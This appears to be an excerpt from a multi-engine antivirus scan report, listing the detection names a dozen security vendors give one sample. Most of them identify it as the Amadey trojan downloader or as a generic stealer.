Varist W32/Stealer.HF.gen!Eldorado
AhnLab-V3 Trojan/Win.Generic.R664066
DeepInstinct MALICIOUS
VBA32 BScope.TrojanDownloader.Deyma
Malwarebytes Trojan.Amadey
Ikarus Trojan-Downloader.Win32.Amadey
Panda Trj/GdSda.A
Tencent Malware.Win32.Gencirc.11c63a0f
huorong TrojanDownloader/Amadey.p
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Amadey.A!tr.dldr
AVG Win32:BotX-gen [Trj]